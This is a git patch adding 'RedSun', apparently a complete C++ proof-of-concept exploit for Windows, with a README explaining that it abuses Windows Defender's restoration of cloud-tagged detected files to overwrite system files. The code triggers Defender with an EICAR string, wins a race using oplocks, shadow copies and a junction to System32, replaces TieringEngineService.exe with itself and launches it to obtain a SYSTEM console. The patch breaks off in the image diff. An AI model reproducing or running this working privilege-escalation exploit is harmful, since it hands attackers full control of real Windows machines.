From 98a4661e1661d29eb60c43c41cb4a81bccc04fb3 Mon Sep 17 00:00:00 2001 From: Church of Malware Date: Wed, 10 Jun 2026 00:54:19 +0000 Subject: [PATCH] Upload files to "/" --- LICENSE | 20 +- README.md | 8 +- RedSun.cpp | 777 +++++++++++++++++++++++++++++++++++++++++++++++++++++ redsun.jpg | Bin 0 -> 65750 bytes 4 files changed, 800 insertions(+), 5 deletions(-) create mode 100644 RedSun.cpp create mode 100644 redsun.jpg diff --git a/LICENSE b/LICENSE index d357013..c30f3fd 100644 --- a/LICENSE +++ b/LICENSE @@ -1,9 +1,21 @@ MIT License -Copyright (c) 2026 ek0ms +Copyright (c) 2026 Nightmare-Eclipse -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/README.md b/README.md index 35ea4ec..20850f7 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,9 @@ # RedSun +The Red Sun vulnerability repository -The Red Sun vulnerability repository \ No newline at end of file +Now, normally I would just drop the PoC code and let people figure it out. But I can't for this one, it's way too funny. +When Windows Defender realizes that a malicious file has a cloud tag, for whatever stupid and hilarious reason, the antivirus that's supposed to protect decides that it is a good idea to just rewrite the file it found again to it's original location. The PoC abuses this behaviour to overwrite system files and gain administrative privileges. + +I think antimalware products are supposed to remove malicious files not be sure they are there but that's just me. + +![BottomText](redsun.jpg) diff --git a/RedSun.cpp b/RedSun.cpp new file mode 100644 index 0000000..eb165d4 --- /dev/null +++ b/RedSun.cpp @@ -0,0 +1,777 @@ + + +// It gets funnier as time passes... + +#define _CRT_SECURE_NO_WARNINGS +#include +#include +#include +#include +#include +#include + +#pragma comment(lib,"synchronization.lib") +#pragma comment(lib,"sas.lib") +#pragma comment(lib,"ntdll.lib") +#pragma comment(lib,"CldApi.lib") + + +typedef struct _FILE_DISPOSITION_INFORMATION_EX { + ULONG Flags; +} FILE_DISPOSITION_INFORMATION_EX, * PFILE_DISPOSITION_INFORMATION_EX; + +typedef struct _FILE_RENAME_INFORMATION { +#if (_WIN32_WINNT >= _WIN32_WINNT_WIN10_RS1) + union { + BOOLEAN ReplaceIfExists; // FileRenameInformation + ULONG Flags; // FileRenameInformationEx + } DUMMYUNIONNAME; +#else + BOOLEAN ReplaceIfExists; +#endif + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_RENAME_INFORMATION, * PFILE_RENAME_INFORMATION; + +typedef struct _OBJECT_DIRECTORY_INFORMATION { + UNICODE_STRING Name; + UNICODE_STRING TypeName; +} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION; + + +typedef struct _REPARSE_DATA_BUFFER { + ULONG ReparseTag; + USHORT ReparseDataLength; + USHORT Reserved; + union { + struct { + USHORT SubstituteNameOffset; + USHORT SubstituteNameLength; + USHORT PrintNameOffset; + USHORT PrintNameLength; + ULONG Flags; + WCHAR PathBuffer[1]; + } SymbolicLinkReparseBuffer; + struct { + USHORT SubstituteNameOffset; + USHORT SubstituteNameLength; + USHORT PrintNameOffset; + USHORT PrintNameLength; + WCHAR PathBuffer[1]; + } MountPointReparseBuffer; + struct { + UCHAR DataBuffer[1]; + } GenericReparseBuffer; + } DUMMYUNIONNAME; +} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER; + +#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer) + + + +HMODULE h = LoadLibrary(L"ntdll.dll"); +HMODULE hm = GetModuleHandle(L"ntdll.dll"); +NTSTATUS(WINAPI* _NtOpenDirectoryObject)( + PHANDLE DirectoryHandle, + ACCESS_MASK DesiredAccess, + POBJECT_ATTRIBUTES ObjectAttributes + ) = (NTSTATUS(WINAPI*)( + PHANDLE DirectoryHandle, + ACCESS_MASK DesiredAccess, + POBJECT_ATTRIBUTES ObjectAttributes + ))GetProcAddress(hm, "NtOpenDirectoryObject");; +NTSTATUS(WINAPI* _NtQueryDirectoryObject)( + HANDLE DirectoryHandle, + PVOID Buffer, + ULONG Length, + BOOLEAN ReturnSingleEntry, + BOOLEAN RestartScan, + PULONG Context, + PULONG ReturnLength + ) = (NTSTATUS(WINAPI*)( + HANDLE DirectoryHandle, + PVOID Buffer, + ULONG Length, + BOOLEAN ReturnSingleEntry, + BOOLEAN RestartScan, + PULONG Context, + PULONG ReturnLength + ))GetProcAddress(hm, "NtQueryDirectoryObject"); +NTSTATUS(WINAPI* _NtSetInformationFile)( + HANDLE FileHandle, + PIO_STATUS_BLOCK IoStatusBlock, + PVOID FileInformation, + ULONG Length, + FILE_INFORMATION_CLASS FileInformationClass + ) = (NTSTATUS(WINAPI*)( + HANDLE FileHandle, + PIO_STATUS_BLOCK IoStatusBlock, + PVOID FileInformation, + ULONG Length, + FILE_INFORMATION_CLASS FileInformationClass + ))GetProcAddress(hm, "NtSetInformationFile"); + + + +struct LLShadowVolumeNames +{ + wchar_t* name; + LLShadowVolumeNames* next; +}; +void DestroyVSSNamesList(LLShadowVolumeNames* First) +{ + while (First) + { + free(First->name); + LLShadowVolumeNames* next = First->next; + free(First); + First = next; + } +} + +LLShadowVolumeNames* RetrieveCurrentVSSList(HANDLE hobjdir, bool* criticalerr, int* vscnumber) +{ + + + if (!criticalerr || !vscnumber) + return NULL; + + *vscnumber = 0; + ULONG scanctx = 0; + ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2); + ULONG retsz = 0; + OBJECT_DIRECTORY_INFORMATION* objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz); + if (!objdirinfo) + { + printf("Failed to allocate required buffer to query object manager directory.\n"); + *criticalerr = true; + return NULL; + } + ZeroMemory(objdirinfo, reqsz); + NTSTATUS stat = STATUS_SUCCESS; + do + { + stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, FALSE, &scanctx, &retsz); + if (stat == STATUS_SUCCESS) + break; + else if (stat != STATUS_MORE_ENTRIES) + { + printf("NtQueryDirectoryObject failed with 0x%0.8X\n", stat); + *criticalerr = true; + return NULL; + } + + free(objdirinfo); + reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100; + objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz); + if (!objdirinfo) + { + printf("Failed to allocate required buffer to query object manager directory.\n"); + *criticalerr = true; + return NULL; + } + ZeroMemory(objdirinfo, reqsz); + } while (1); + void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION)); + ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)); + LLShadowVolumeNames* LLVSScurrent = NULL; + LLShadowVolumeNames* LLVSSfirst = NULL; + for (ULONG i = 0; i < ULONG_MAX; i++) + { + if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) + { + free(emptybuff); + break; + } + if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) + { + wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" }; + if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) + { + if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) + { + (*vscnumber)++; + if (LLVSScurrent) + { + LLVSScurrent->next = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames)); + if (!LLVSScurrent->next) + { + printf("Failed to allocate memory.\n"); + *criticalerr = true; + DestroyVSSNamesList(LLVSSfirst); + return NULL; + } + ZeroMemory(LLVSScurrent->next, sizeof(LLShadowVolumeNames)); + LLVSScurrent = LLVSScurrent->next; + LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t)); + if (!LLVSScurrent->name) + { + printf("Failed to allocate memory !!!\n"); + *criticalerr = true; + return NULL; + } + ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t)); + memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length); + } + else + { + LLVSSfirst = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames)); + if (!LLVSSfirst) + { + printf("Failed to allocate memory.\n"); + *criticalerr = true; + return NULL; + } + ZeroMemory(LLVSSfirst, sizeof(LLShadowVolumeNames)); + LLVSScurrent = LLVSSfirst; + LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t)); + if (!LLVSScurrent->name) + { + printf("Failed to allocate memory !!!\n"); + *criticalerr = true; + return NULL; + } + ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t)); + memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length); + + } + + } + } + } + + + + + } + free(objdirinfo); + return LLVSSfirst; + + +} + + +HANDLE gevent = CreateEvent(NULL, FALSE, NULL, NULL); + +DWORD WINAPI ShadowCopyFinderThread(wchar_t* foo) +{ + + wchar_t devicepath[] = L"\\Device"; + UNICODE_STRING udevpath = { 0 }; + RtlInitUnicodeString(&udevpath, devicepath); + OBJECT_ATTRIBUTES objattr = { 0 }; + InitializeObjectAttributes(&objattr, &udevpath, OBJ_CASE_INSENSITIVE, NULL, NULL); + NTSTATUS stat = STATUS_SUCCESS; + HANDLE hobjdir = NULL; + stat = _NtOpenDirectoryObject(&hobjdir, 0x0001, &objattr); + if (stat) + { + printf("Failed to open object manager directory, error : 0x%0.8X", stat); + return 1; + } + bool criterr = false; + int vscnum = 0; + LLShadowVolumeNames* vsinitial = RetrieveCurrentVSSList(hobjdir, &criterr, &vscnum); + + if (criterr) + { + printf("Unexpected error while listing current volume shadow copy volumes\n"); + ExitProcess(1); + } + + + bool restartscan = false; + ULONG scanctx = 0; + ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2); + ULONG retsz = 0; + OBJECT_DIRECTORY_INFORMATION* objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz); + if (!objdirinfo) + { + printf("Failed to allocate required buffer to query object manager directory.\n"); + ExitProcess(1); + } + ZeroMemory(objdirinfo, reqsz); + stat = STATUS_SUCCESS; + bool srchfound = false; +scanagain: + do + { + scanctx = 0; + stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, restartscan, &scanctx, &retsz); + if (stat == STATUS_SUCCESS) + break; + else if (stat != STATUS_MORE_ENTRIES) + { + printf("NtQueryDirectoryObject failed with 0x%0.8X\n", stat); + ExitProcess(1); + } + + free(objdirinfo); + reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100; + objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz); + if (!objdirinfo) + { + printf("Failed to allocate required buffer to query object manager directory.\n"); + ExitProcess(1); + } + ZeroMemory(objdirinfo, reqsz); + } while (1); + void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION)); + if (!emptybuff) + { + printf("Failed to allocate memory !!!"); + ExitProcess(1); + } + ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)); + wchar_t newvsspath[MAX_PATH] = { 0 }; + wcscpy(newvsspath, L"\\Device\\"); + + for (ULONG i = 0; i < ULONG_MAX; i++) + { + if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) + { + free(emptybuff); + emptybuff = NULL; + break; + } + if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) + { + wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" }; + if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) + { + if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) + { + // check against the list if there this is a unique VS Copy + LLShadowVolumeNames* current = vsinitial; + bool found = false; + while (current) + { + if (_wcsicmp(current->name, objdirinfo[i].Name.Buffer) == 0) + { + found = true; + break; + } + current = current->next; + } + if (found) + continue; + else + { + srchfound = true; + wcscat(newvsspath, objdirinfo[i].Name.Buffer); + break; + } + } + } + } + } + + if (!srchfound) { + restartscan = true; + goto scanagain; + } + if (objdirinfo) + free(objdirinfo); + NtClose(hobjdir); + + wchar_t malpath[MAX_PATH] = { 0 }; + wcscpy(malpath, newvsspath); + wcscat(malpath, &foo[2]); + UNICODE_STRING _malpath = { 0 }; + RtlInitUnicodeString(&_malpath, malpath); + OBJECT_ATTRIBUTES objattr2 = { 0 }; + InitializeObjectAttributes(&objattr2, &_malpath, OBJ_CASE_INSENSITIVE, NULL, NULL); + IO_STATUS_BLOCK iostat = { 0 }; + HANDLE hlk = NULL; +retry: + stat = NtCreateFile(&hlk, DELETE | SYNCHRONIZE, &objattr2, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, NULL, FILE_OPEN, NULL, NULL, NULL); + if (stat == STATUS_NO_SUCH_DEVICE) + goto retry; + if (stat) + { + printf("Failed to open file, error : 0x%0.8X\n", stat); + return 1; + + } + printf("The sun is shinning...\n"); + + + OVERLAPPED ovd = { 0 }; + ovd.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); + DeviceIoControl(hlk, FSCTL_REQUEST_BATCH_OPLOCK, NULL, NULL, NULL, NULL, NULL, &ovd); + if (GetLastError() != ERROR_IO_PENDING) + { + printf("Failed to request a batch oplock on the update file, error : %d", GetLastError()); + return 0; + } + + + DWORD nbytes = 0; + SetEvent(gevent); + ResetEvent(gevent); + GetOverlappedResult(hlk, &ovd, &nbytes, TRUE); + + WaitForSingleObject(gevent, INFINITE); + + + CloseHandle(hlk); + WakeByAddressAll(&gevent); + CloseHandle(gevent); + gevent = NULL; + + return ERROR_SUCCESS; +} + + +void rev(char* s) { + + // Initialize l and r pointers + int l = 0; + int r = strlen(s) - 1; + char t; + + // Swap characters till l and r meet + while (l < r) { + + // Swap characters + t = s[l]; + s[l] = s[r]; + s[r] = t; + + // Move pointers towards each other + l++; + r--; + } +} + + +void DoCloudStuff(wchar_t* syncroot, wchar_t* filename, DWORD filesz = 0x1000) +{ + + CF_SYNC_REGISTRATION cfreg = { 0 }; + cfreg.StructSize = sizeof(CF_SYNC_REGISTRATION); + cfreg.ProviderName = L"SERIOUSLYMSFT"; // let's see how long you can play this game, I'm willing to go as far as you want. + cfreg.ProviderVersion = L"1.0"; + CF_SYNC_POLICIES syncpolicy = { 0 }; + syncpolicy.StructSize = sizeof(CF_SYNC_POLICIES); + syncpolicy.HardLink = CF_HARDLINK_POLICY_ALLOWED; + syncpolicy.Hydration.Primary = CF_HYDRATION_POLICY_PARTIAL; + syncpolicy.Hydration.Modifier = CF_HYDRATION_POLICY_MODIFIER_NONE; + syncpolicy.PlaceholderManagement = CF_PLACEHOLDER_MANAGEMENT_POLICY_DEFAULT; + syncpolicy.InSync = CF_INSYNC_POLICY_NONE; + HRESULT hs = CfRegisterSyncRoot(syncroot, &cfreg, &syncpolicy, CF_REGISTER_FLAG_DISABLE_ON_DEMAND_POPULATION_ON_ROOT); + if (hs) + { + printf("Failed to register syncroot, hr = 0x%0.8X\n", hs); + return; + } + + CF_CALLBACK_REGISTRATION callbackreg[1]; + callbackreg[0] = { CF_CALLBACK_TYPE_NONE, NULL }; + void* callbackctx = NULL; + CF_CONNECTION_KEY cfkey = { 0 }; + hs = CfConnectSyncRoot(syncroot, callbackreg, callbackctx, CF_CONNECT_FLAG_REQUIRE_PROCESS_INFO | CF_CONNECT_FLAG_REQUIRE_FULL_FILE_PATH, &cfkey); + if (hs) + { + printf("Failed to connect to syncroot, hr = 0x%0.8X\n", hs); + return; + } + + SYSTEMTIME systime = { 0 }; + FILETIME filetime = { 0 }; + GetSystemTime(&systime); + SystemTimeToFileTime(&systime, &filetime); + + FILE_BASIC_INFO filebasicinfo = { 0 }; + filebasicinfo.FileAttributes = FILE_ATTRIBUTE_NORMAL; + CF_FS_METADATA fsmetadata = { filebasicinfo, {filesz} }; + CF_PLACEHOLDER_CREATE_INFO placeholder[1] = { 0 }; + placeholder[0].RelativeFileName = filename; + placeholder[0].FsMetadata = fsmetadata; + + + GUID uid = { 0 }; + wchar_t wuid[100] = {0}; + CoCreateGuid(&uid); + StringFromGUID2(uid, wuid,100); + placeholder[0].FileIdentity = wuid; + placeholder[0].FileIdentityLength = lstrlenW(wuid) * sizeof(wchar_t); + placeholder[0].Flags = CF_PLACEHOLDER_CREATE_FLAG_SUPERSEDE | CF_PLACEHOLDER_CREATE_FLAG_MARK_IN_SYNC; + DWORD processedentries = 0; + //WaitForSingleObject(hevent, INFINITE); + hs = CfCreatePlaceholders(syncroot, placeholder, 1, CF_CREATE_FLAG_STOP_ON_ERROR, &processedentries); + if (hs) + { + printf("Failed to create placeholder file, error : 0x%0.8X\n", hs); + return; + } + return; + + +} + + +void LaunchConsoleInSessionId() +{ + + HANDLE hpipe = CreateFile(L"\\??\\pipe\\REDSUN", GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (hpipe == INVALID_HANDLE_VALUE) + return; + DWORD sessionid = 0; + if (!GetNamedPipeServerSessionId(hpipe, &sessionid)) + return; + CloseHandle(hpipe); + HANDLE htoken = NULL; + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &htoken)) + return; + HANDLE hnewtoken = NULL; + bool res = DuplicateTokenEx(htoken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hnewtoken); + CloseHandle(htoken); + if (!res) + return; + + res = SetTokenInformation(hnewtoken, TokenSessionId, &sessionid, sizeof(DWORD)); + if (!res) + { + CloseHandle(hnewtoken); + return; + } + + STARTUPINFO si = { 0 }; + PROCESS_INFORMATION pi = { 0 }; + CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi); + + CloseHandle(hnewtoken); + + if (pi.hProcess) + CloseHandle(pi.hProcess); + if (pi.hThread) + CloseHandle(pi.hThread); + return; + +} + +bool IsRunningAsLocalSystem() +{ + + HANDLE htoken = NULL; + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htoken)) { + printf("OpenProcessToken failed, error : %d\n", GetLastError()); + return false; + } + TOKEN_USER* tokenuser = (TOKEN_USER*)malloc(MAX_SID_SIZE + sizeof(TOKEN_USER)); + DWORD retsz = 0; + bool res = GetTokenInformation(htoken, TokenUser, tokenuser, MAX_SID_SIZE + sizeof(TOKEN_USER), &retsz); + CloseHandle(htoken); + if (!res) + return false; + bool ret = IsWellKnownSid(tokenuser->User.Sid, WinLocalSystemSid); + if (ret) { + LaunchConsoleInSessionId(); + ExitProcess(0); + } + return ret; +} +bool r = IsRunningAsLocalSystem(); + +void LaunchTierManagementEng() +{ + CoInitialize(NULL); + GUID guidObject = { 0x50d185b9,0xfff3,0x4656,{0x92,0xc7,0xe4,0x01,0x8d,0xa4,0x36,0x1d} }; + void* ret = NULL; + HRESULT hr = CoCreateInstance(guidObject, NULL, CLSCTX_LOCAL_SERVER, guidObject, &ret); + + + CoUninitialize(); +} + +int main() +{ + HANDLE hpipe = CreateNamedPipe(L"\\??\\pipe\\REDSUN", PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE, NULL, 1, NULL, NULL, NULL,NULL); + if (hpipe == INVALID_HANDLE_VALUE) + return 1; + + wchar_t workdir[MAX_PATH] = { 0 }; + ExpandEnvironmentStrings(L"%TEMP%\\RS-", workdir, MAX_PATH); + + GUID uid = { 0 }; + wchar_t wuid[100] = { 0 }; + CoCreateGuid(&uid); + StringFromGUID2(uid, wuid, 100); + wcscat(workdir, wuid); + wchar_t filename[] = L"TieringEngineService.exe"; + wchar_t foo[MAX_PATH]; + wsprintf(foo, L"%ws\\%ws", workdir, filename); + + DWORD tid = 0; + HANDLE hthread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)ShadowCopyFinderThread, foo, NULL, &tid); + + if (!CreateDirectory(workdir, NULL)) + { + printf("Failed to create workdir"); + return 1; + } + HANDLE hfile = CreateFile(foo, GENERIC_READ | GENERIC_WRITE | DELETE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hfile == INVALID_HANDLE_VALUE) + { + printf("Failed create spoof work file.\n"); + return 1; + } + char eicar[] = "*H+H$!ELIF-TSET-SURIVITNA-DRADNATS-RACIE$}7)CC7)^P(45XZP\\4[PA@%P!O5X"; + rev(eicar); + DWORD nwf = 0; + WriteFile(hfile, eicar, sizeof(eicar) - 1, &nwf, NULL); + + // trigger AV response + CreateFile(foo, GENERIC_READ | FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (WaitForSingleObject(gevent, 120000) != WAIT_OBJECT_0) + { + printf("PoC timed out, is real time protection enabled ?"); + return 1; + } + + IO_STATUS_BLOCK iostat = { 0 }; + FILE_DISPOSITION_INFORMATION_EX fdiex = { 0x00000001 | 0x00000002 }; + _NtSetInformationFile(hfile, &iostat, &fdiex, sizeof(fdiex), (FILE_INFORMATION_CLASS)64); + CloseHandle(hfile); + DoCloudStuff(workdir, filename, sizeof(eicar) - 1); + + OVERLAPPED ovd = { 0 }; + ovd.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); + + SetEvent(gevent); + + WaitOnAddress(&gevent, &gevent, sizeof(HANDLE), INFINITE); + + NTSTATUS stat; + wchar_t ntfoo[MAX_PATH] = { L"\\??\\" }; + wcscat(ntfoo, foo); + UNICODE_STRING _foo = { 0 }; + RtlInitUnicodeString(&_foo, ntfoo); + OBJECT_ATTRIBUTES _objattr = { 0 }; + InitializeObjectAttributes(&_objattr, &_foo, OBJ_CASE_INSENSITIVE, NULL, NULL); + + wchar_t _tmp[MAX_PATH] = { 0 }; + wsprintf(_tmp, L"\\??\\%s.TMP", workdir); + MoveFileEx(workdir,_tmp,MOVEFILE_REPLACE_EXISTING); + if (!CreateDirectory(workdir, NULL)) + { + printf("Failed to re-create directory.\n"); + return 1; + } + LARGE_INTEGER fsz = { 0 }; + fsz.QuadPart = 0x1000; + stat = NtCreateFile(&hfile, FILE_READ_DATA | DELETE | SYNCHRONIZE, &_objattr, &iostat, &fsz, FILE_ATTRIBUTE_READONLY, FILE_SHARE_READ, FILE_SUPERSEDE, NULL, NULL, NULL); + if (stat) + { + printf("Failed to re-open spoof work file, error : 0x%0.8X\n", stat); + return 1; + } + DeviceIoControl(hfile, FSCTL_REQUEST_BATCH_OPLOCK, NULL, NULL, NULL, NULL, NULL, &ovd); + if (GetLastError() != ERROR_IO_PENDING) + { + printf("Failed to request a batch oplock on the update file, error : %d", GetLastError()); + return 1; + } + + HANDLE hmap = CreateFileMapping(hfile, NULL, PAGE_READONLY, NULL, NULL, NULL); + void* mappingaddr = MapViewOfFile(hmap, PAGE_READONLY, NULL, NULL, NULL); + + DWORD nbytes = 0; + GetOverlappedResult(hfile, &ovd, &nbytes, TRUE); + UnmapViewOfFile(mappingaddr); + CloseHandle(hmap); + + + { + wchar_t _tmp[MAX_PATH] = { 0 }; + wsprintf(_tmp, L"\\??\\%s.TEMP2", workdir); + + PFILE_RENAME_INFORMATION pfri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp))); + ZeroMemory(pfri, sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp))); + pfri->ReplaceIfExists = TRUE; + pfri->FileNameLength = (sizeof(wchar_t) * wcslen(_tmp)); + memmove(&pfri->FileName[0], _tmp, (sizeof(wchar_t) * wcslen(_tmp))); + stat = _NtSetInformationFile(hfile, &iostat, pfri, sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp)), (FILE_INFORMATION_CLASS)10); + _NtSetInformationFile(hfile, &iostat, &fdiex, sizeof(fdiex), (FILE_INFORMATION_CLASS)64); + } + wchar_t _rp[MAX_PATH] = { L"\\??\\" }; + wcscat(_rp, workdir); + UNICODE_STRING _usrp = { 0 }; + RtlInitUnicodeString(&_usrp, _rp); + InitializeObjectAttributes(&_objattr, &_usrp, OBJ_CASE_INSENSITIVE, NULL, NULL); + HANDLE hrp = NULL; + stat = NtCreateFile(&hrp, FILE_WRITE_DATA | DELETE | SYNCHRONIZE, &_objattr, &iostat, NULL, NULL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN_IF, FILE_DIRECTORY_FILE | FILE_DELETE_ON_CLOSE, NULL, NULL); + if (stat) + { + printf("Failed to re-open work directory.\n"); + return 1; + } + + + wchar_t rptarget[] = { L"\\??\\C:\\Windows\\System32" }; + DWORD targetsz = wcslen(rptarget) * 2; + DWORD printnamesz = 1 * 2; + DWORD pathbuffersz = targetsz + printnamesz + 12; + DWORD totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH; + REPARSE_DATA_BUFFER* rdb = (REPARSE_DATA_BUFFER*)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, totalsz); + rdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; + rdb->ReparseDataLength = static_cast(pathbuffersz); + rdb->Reserved = NULL; + rdb->MountPointReparseBuffer.SubstituteNameOffset = NULL; + rdb->MountPointReparseBuffer.SubstituteNameLength = static_cast(targetsz); + memcpy(rdb->MountPointReparseBuffer.PathBuffer, rptarget, targetsz + 2); + rdb->MountPointReparseBuffer.PrintNameOffset = static_cast(targetsz + 2); + rdb->MountPointReparseBuffer.PrintNameLength = static_cast(printnamesz); + memcpy(rdb->MountPointReparseBuffer.PathBuffer + targetsz / 2 + 1, rptarget, printnamesz); + DWORD ret = DeviceIoControl(hrp, FSCTL_SET_REPARSE_POINT, rdb, totalsz, NULL, NULL, NULL, NULL); + HeapFree(GetProcessHeap(), NULL, rdb); + + HANDLE hlk = NULL; + + HANDLE htimer = CreateWaitableTimer(NULL, FALSE, NULL); + LARGE_INTEGER duetime = { 0 }; + GetSystemTimeAsFileTime((LPFILETIME)&duetime); + ULARGE_INTEGER _duetime = { duetime.LowPart, duetime.HighPart }; + _duetime.QuadPart += 0x2FAF080; + duetime.QuadPart = _duetime.QuadPart; + CloseHandle(hfile); + for (int i = 0; i < 1000; i++) + { + wchar_t malpath[] = { L"\\??\\C:\\Windows\\System32\\TieringEngineService.exe" }; + UNICODE_STRING _malpath = { 0 }; + RtlInitUnicodeString(&_malpath, malpath); + OBJECT_ATTRIBUTES objattr2 = { 0 }; + InitializeObjectAttributes(&objattr2, &_malpath, OBJ_CASE_INSENSITIVE, NULL, NULL); + IO_STATUS_BLOCK iostat = { 0 }; + stat = NtCreateFile(&hlk, GENERIC_WRITE, &objattr2, &iostat, NULL, NULL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_SUPERSEDE, NULL, NULL, NULL); + if (!stat) + break; + Sleep(20); + } + + + if (stat != STATUS_SUCCESS) + { + printf("Something went wrong.\n"); + return 1; + } + printf("The red sun shall prevail.\n"); + + CloseHandle(hlk); + CloseHandle(hrp); + + + + wchar_t mx[MAX_PATH] = { 0 }; + GetModuleFileName(GetModuleHandle(NULL), mx, MAX_PATH); + wchar_t mx2[MAX_PATH] = { 0 }; + ExpandEnvironmentStrings(L"%WINDIR%\\System32\\TieringEngineService.exe", mx2, MAX_PATH); + CopyFile(mx, mx2, FALSE); + LaunchTierManagementEng(); + Sleep(2000); + CloseHandle(hpipe); + + return 0; +} diff --git a/redsun.jpg b/redsun.jpg new file mode 100644 index 